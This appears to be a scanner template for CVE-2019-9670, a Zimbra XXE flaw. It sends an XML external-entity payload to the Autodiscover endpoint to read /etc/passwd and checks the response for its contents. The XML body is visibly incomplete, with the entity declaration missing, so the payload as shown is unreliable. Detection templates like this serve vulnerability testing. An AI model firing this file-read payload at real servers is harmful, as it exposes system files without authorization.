id: CVE-2019-9670 info: name: Zimbra RCE risk: Critical params: - root: '{{.BaseURL}}' variables: - exp: | file:./../../../../../etc/passwd requests: - method: POST redirect: false url: >- {{.root}}//Autodiscover/Autodiscover.xml headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - Content-Type: text/xml body: | ]>test@test.com&xxe; detections: - >- StringSearch("response", "zmmailboxd.out") && StringSearch("response", "Requested response schema not available") - >- RegexSearch("resBody", "root:[x*]:0:0:") && StringSearch("response", "/bin/bash") references: - https://www.cvebase.com/cve/2019/9670